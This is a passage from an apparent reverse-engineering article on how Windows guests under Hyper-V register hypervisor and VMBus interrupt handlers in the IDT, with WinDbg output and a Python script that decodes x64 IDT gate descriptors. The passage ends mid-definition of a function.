<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The output shows that the IRQ 7 address handler that will be in the 0x71 cell of IDT, for IRQ 5 - 0x81. Generation numbers interrupt handlers are using the acpi!ProcessorReserveIdtEntries function at the stage of construction of the device tree PnP-manager, when the functional device driver is not already loaded. Register ISR in the IDT has been going in the later stages, for example, when the device driver procedure IoConnectInterrupt will be executed. However, looking at the elements of IDT, we see that the ISR for the interrupt of 0x71 and 0x81 is not registered: </span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> !idt -a</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">…………………………………………………………………………………………………………………………….</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">71:</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff80323f73938 nt!KxUnexpectedInterrupt0+0x388</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">81:</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff80323f739b8 nt!KxUnexpectedInterrupt0+0x408</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">…………………………………………………………………………………………………………………………….</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In Windows Server 2012 R2 Gen2 for IRQ 5 was mapped 0x90 the IDT.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> !acpiirqarb – for guest Windows Server 2012 R2 Gen2</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Processor 0 (0, 0):</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Device Object: 0000000000000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Current IDT Allocation:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 0000000000000000 - 0000000000000050 00000000 <Not on bus> A:0000000000000000 IRQ(GSIV):10</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">0000000000000090 - 0000000000000090 D ffffe001f35eb520 (vmbus) A:ffffc00133972660 IRQ(GSIV):5</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">…………………………………………………………………………………………………………………………….</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ISR -procedure for interrupt 0x90 also is not defined:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> !idt -a</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">90:</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff8014a3daa30 nt!KxUnexpectedInterrupt0+0x480</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In Windows 8.1x86 we see a slightly different picture</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> !acpiirqarb – for Windows 8.1 x86</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Processor 0 (0, 0):</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Device Object: 00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Current IDT Allocation:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">…………………………………………………………………………………………………………………………….</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">0000000000000081 - 0000000000000081 D 87f2f030 (vmbus) A:881642a8 IRQ(GSIV):fffffffe – such values are generally associated with MSI devices.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">…………………………………………………………………………………………………………………………….</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">00000000000000b2 - 00000000000000b2 S B 87f31030 (s3cap) A:8814b840 IRQ(GSIV):5</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In addition, the ISR registered for interrupt vector 0x81 is the procedure vmbus!XPartPncIsr:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> !idt</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">81:</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">81b18a0c vmbus!XPartPncIsr (KINTERRUPT </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">87b59e40</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">b2:</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">81b18c58 nt!KiUnexpectedInterrupt130</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">s3cap is an auxiliary driver for the S3 Trio video card emulated by Hyper-V.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="190" src="https://lh6.googleusercontent.com/EwIkG9PHPhHsIdUnKbhdZT5UZi-E1ZhIiYzLAnBKKYG1RGllvlqkxAb2EMZ-k4l6oZ1NHfxV7tAPnNy59Qmd3tuWd4G3lHp3mEVU1jtOENIEfUXeRHcDm5TZ0oDdpNOpkQr0Rqi2ybehGAcC" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="361" /></span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Thus the ISR vmbus!XPartPncIsr is registered in the IDT only in Windows 8.1 x86 (presumably the other x86 operating systems that Microsoft supports as Hyper-V guests use the same method). The vmbus!XPartPncIsr procedure handles the interrupts generated by the hypervisor.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">On x64 systems, starting with Windows 8 / Windows Server 2012, integration with the hypervisor is implemented slightly differently: handlers for the interrupts generated by the hypervisor are added to the system IDT itself. Let us briefly consider how the IDT is formed during Windows boot.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-indent: 28.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">After the Windows loader winload.efi has initialized it, the IDT looks as follows (output of a pykd script run from a WinDbg breakpoint in winload.efi during boot with the /bootdebug parameter):</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-indent: 28.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> !py D:\hyperv4\idt_winload_parse.py</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-indent: 28.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">isr 1 address = winload!BdTrap01</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-indent: 28.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">isr 3 address = winload!BdTrap03</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-indent: 28.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">isr d address = winload!BdTrap0d</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-indent: 28.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">isr e address = winload!BdTrap0e</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-indent: 28.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">isr 29 address = winload!BdTrap29</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-indent: 28.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">isr 2c address = winload!BdTrap2c</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-indent: 28.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">isr 2d address = winload!BdTrap2d</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Then, in winload!OslArchTransferToKernel, the IDT is cleared and control is passed to the Windows kernel, where nt!KiInitializeBootStructures fills the IDT with the values from the KiInterruptInitTable table:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> dps KiInterruptInitTable L40</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">……………………………………………………………………………………….</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff800`1b9553c0 00000000`00000030</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff800`1b9553c8 fffff800`1b377160 nt!KiHvInterrupt</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff800`1b9553d0 00000000`00000031</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff800`1b9553d8 fffff800`1b3774c0 nt!KiVmbusInterrupt0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff800`1b9553e0 00000000`00000032</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff800`1b9553e8 fffff800`1b377810 nt!KiVmbusInterrupt1</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff800`1b9553f0 00000000`00000033</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff800`1b9553f8 fffff800`1b377b60 nt!KiVmbusInterrupt2</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff800`1b955400 00000000`00000034</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff800`1b955408 fffff800`1b377eb0 nt!KiVmbusInterrupt3</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">……………………………………………………………………………………….</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Accordingly, after initialization the IDT entries for vectors 0x30-0x34 look like this:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> !idt</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">……………………………………………………………………………………….</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">30:</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff8001b377160 nt!KiHvInterrupt</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">31:</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff8001b3774c0 nt!KiVmbusInterrupt0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">32:</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff8001b377810 nt!KiVmbusInterrupt1</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">33:</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff8001b377b60 nt!KiVmbusInterrupt2</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">34:</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff8001b377eb0 nt!KiVmbusInterrupt3</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">……………………………………………………………………………………….</span></div>
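<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The listings above (the winload.efi pykd output and the kernel !idt output) are both produced by walking the x64 IDT gate by gate. The script below is an added example of that walk, not the post's own idt_winload_parse.py: it decodes the 16-byte x64 gate descriptor (the 64-bit handler offset is split over three fields), walks a table through an injected memory reader, and resolves each present handler. The sample table it runs on is constructed here, using the five handler addresses from the !idt listing above with a made-up table base; the dump_live_idt wrapper assumes that pykd exposes idtr/idtl through pykd.reg(), memory through pykd.loadBytes() and symbols through pykd.findSymbol().</span></div>

```python
"""Decode x64 IDT gate descriptors and walk the table the way the winload
and kernel listings above were produced.  Added example, not the post's own
idt_winload_parse.py; the sample memory below is constructed."""
import struct
from dataclasses import dataclass
from typing import Callable, Dict, Iterator, Optional, Tuple

GATE_SIZE = 16  # an x64 interrupt/trap gate descriptor is 16 bytes


@dataclass
class IdtGate:
    vector: int
    offset: int       # linear address of the handler (the ISR)
    selector: int     # code segment selector loaded on entry
    ist: int          # interrupt stack table slot, 0 = none
    gate_type: int    # 0xE = interrupt gate, 0xF = trap gate
    dpl: int
    present: bool


def parse_idt_gate(vector: int, raw: bytes) -> IdtGate:
    """Unpack one gate; the 64-bit handler offset is split over three fields."""
    if len(raw) != GATE_SIZE:
        raise ValueError("an x64 IDT gate must be exactly 16 bytes")
    off_lo, selector, ist_byte, attr, off_mid, off_hi, _rsvd = struct.unpack(
        "<HHBBHII", raw)
    offset = off_lo | (off_mid << 16) | (off_hi << 32)
    return IdtGate(vector=vector, offset=offset, selector=selector,
                   ist=ist_byte & 0x7, gate_type=attr & 0xF,
                   dpl=(attr >> 5) & 0x3, present=bool(attr & 0x80))


def build_idt_gate(offset: int, selector: int = 0x10, ist: int = 0,
                   gate_type: int = 0xE, dpl: int = 0, present: bool = True) -> bytes:
    """Inverse of parse_idt_gate; used here only to construct sample memory."""
    attr = (gate_type & 0xF) | ((dpl & 0x3) << 5) | (0x80 if present else 0)
    return struct.pack("<HHBBHII", offset & 0xFFFF, selector, ist & 0x7, attr,
                       (offset >> 16) & 0xFFFF, (offset >> 32) & 0xFFFFFFFF, 0)


def walk_idt(read: Callable[[int, int], bytes], idt_base: int, idt_limit: int,
             resolve: Optional[Callable[[int], str]] = None
             ) -> Iterator[Tuple[IdtGate, str]]:
    """Yield (gate, symbol) for every present gate.  read(addr, size) and
    resolve(addr) are injected so the same walk runs offline or under pykd."""
    for vector in range((idt_limit + 1) // GATE_SIZE):
        gate = parse_idt_gate(vector, read(idt_base + vector * GATE_SIZE, GATE_SIZE))
        if gate.present:
            yield gate, (resolve(gate.offset) if resolve else "")


# Constructed sample: the five hypervisor-related handlers from the !idt
# listing above, placed in an otherwise empty 256-entry table.  The table
# base address is made up; the handler addresses are the ones shown above.
SAMPLE_IDT_BASE = 0xfffff8001b9a0000
SAMPLE_HANDLERS: Dict[int, Tuple[int, str]] = {
    0x30: (0xfffff8001b377160, "nt!KiHvInterrupt"),
    0x31: (0xfffff8001b3774c0, "nt!KiVmbusInterrupt0"),
    0x32: (0xfffff8001b377810, "nt!KiVmbusInterrupt1"),
    0x33: (0xfffff8001b377b60, "nt!KiVmbusInterrupt2"),
    0x34: (0xfffff8001b377eb0, "nt!KiVmbusInterrupt3"),
}


def _build_sample_memory() -> bytes:
    table = bytearray(256 * GATE_SIZE)  # all-zero gates are "not present"
    for vector, (addr, _) in SAMPLE_HANDLERS.items():
        table[vector * GATE_SIZE:(vector + 1) * GATE_SIZE] = build_idt_gate(addr)
    return bytes(table)


_SAMPLE_MEMORY = _build_sample_memory()


def sample_read(addr: int, size: int) -> bytes:
    start = addr - SAMPLE_IDT_BASE
    return _SAMPLE_MEMORY[start:start + size]


def sample_resolve(addr: int) -> str:
    names = {a: name for a, name in SAMPLE_HANDLERS.values()}
    return names.get(addr, f"{addr:#x}")


def dump_sample_idt() -> Dict[int, str]:
    """Vector -> symbol for every present gate of the constructed table."""
    return {gate.vector: sym for gate, sym in
            walk_idt(sample_read, SAMPLE_IDT_BASE, 256 * GATE_SIZE - 1, sample_resolve)}


def dump_live_idt() -> None:
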